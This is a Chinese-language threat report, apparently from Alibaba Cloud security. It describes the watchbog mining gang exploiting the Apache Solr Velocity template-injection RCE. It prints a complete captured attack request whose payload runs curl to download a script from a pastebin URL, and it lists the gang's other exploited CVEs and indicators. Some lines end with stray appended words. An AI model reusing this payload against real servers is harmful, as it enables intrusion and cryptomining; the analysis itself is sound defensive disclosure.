近日,阿里雲安全團隊監測到挖礦團伙watchbog更新了其使用的武器庫,增長了最新Solr Velocity 模板注入遠程命令執行漏洞的攻擊方式,攻擊成功後會下載門羅幣挖礦程序進行牟利。建議用戶及時排查自身主機是否受到影響。java
值得注意的是,此漏洞利用代碼於10月31日被公佈,11月2日阿里雲安全團隊就已發現watchbog團伙利用此漏洞進行入侵,植入木馬進行挖礦,漏洞公開不足2日便被挖礦團伙利用進行攻擊牟利。能夠看到,當新的漏洞被披露出來時,可供企業用戶修復的時間窗口愈來愈短,所以防守方須要及時地關注新披露可利用漏洞,以及採起緩解措施或進行修復,必要時可考慮選用安全產品幫助保障安全。shell
watchbog團伙最先出現於2018年,是一個利用多種漏洞攻擊方式向目標主機植入挖礦木馬的惡意團伙,經過挖取門羅幣牟利並維持C&C通訊以供團伙後續動做。自出現後更新頻繁,一直在嘗試利用最新的漏洞進行攻擊。安全
Apache Solr是開源企業搜索平臺,主要包括全文搜索、動態聚類、富文本處理等功能。在2019年10月31日,國外安全研究員公開了Solr Velocity模板注入的POC。此漏洞存在於Solr默認集成組件Solr.VelocityResponseWriter
中,參數params.resource.loader.enabled
能夠控制是否根據請求參數來加載指定模板,雖然默認爲false,但攻擊者能夠經過發送/[core_name]/config
來手動設置此參數的開啓,以後即可構造惡意請求執行指令。bash
攻擊者首先能夠經過[core_admin]
獲取服務器core_name,以後經過發送如下命令將加載模板指令打開。服務器
開啓從參數指定模板後,攻擊者即可以發送惡意代碼從而進行惡意行爲。curl
11月2日,阿里雲安全團隊發現有攻擊者利用Solr Velocity漏洞發起入侵,其會向受到此漏洞影響的主機發送如下數據:ide
GET /solr/scalebay_2/select?q=1&&wt=velocity&v.template=custom&v.template.custom=#set($x='')+#set($rt=$x.class.forName('java.lang.Runtime'))+#set($chr=$x.class.forName('java.lang.Character'))+#set($str=$x.class.forName('java.lang.String'))+#set($ex=$rt.getRuntime().exec('curl -fsSL https://pastebin.com/raw/dhQaGbMa -o /tmp/baby'))+$ex.waitFor()+#set($out=$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end HTTP/1.1
Accept-Encoding: identity
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)複製代碼
跟進其使用的腳本 pastebin.com/raw/dhQaGbM…,此腳本格式內容與阿里雲安全團隊以前捕獲的watchbog惡意腳本內容格式基本一致,(可參考以前阿里雲安全針對watchbog的分析文章,參考文末相關連接),能夠確認爲同一團伙所爲,腳本相同內容再也不贅述。除了新增了Solr Velocity攻擊方式外,其新增了cleanoldpack函數用以清除舊版木馬以及其餘惡意團伙惡意程序,可見黑產之間的相互競爭也很是激烈。函數
序號 | 攻擊方式 |
---|---|
1 | Solr dataimport RCE(CVE-2019-0193) |
2 | Nexus Repository Manager(CVE_2019_5475) |
3 | Windows blueKeep RDP RCE (CVE-2019-0708) |
4 | JIRA模板注入(CVE-2019-11581) |
5 | Exim Mail Server 遠程命令執行(CVE-2019-10149) |
6 | Solr 實體注入 (CVE-2017-12629) |
7 | Couchdb 遠程命令執行(CVE-2018-8007) |
8 | Nexus Repository Manager 3 遠程命令執行(CVE-2019-7238) |
9 | Jenkins 遠程命令執行(CVE-2018-1000861) |
10 | Redis未受權訪問、Redis任意lua字節碼執行(CVE-2015-4335) |
pastebin[.]com/raw/dhQaGbMa
pastebin[.]com/raw/9QVpd02i
pastebin[.]com/raw/6HtLs31b網站
MD5:
9f63e1105214ea94766d8c2fe2ba0da0阿里雲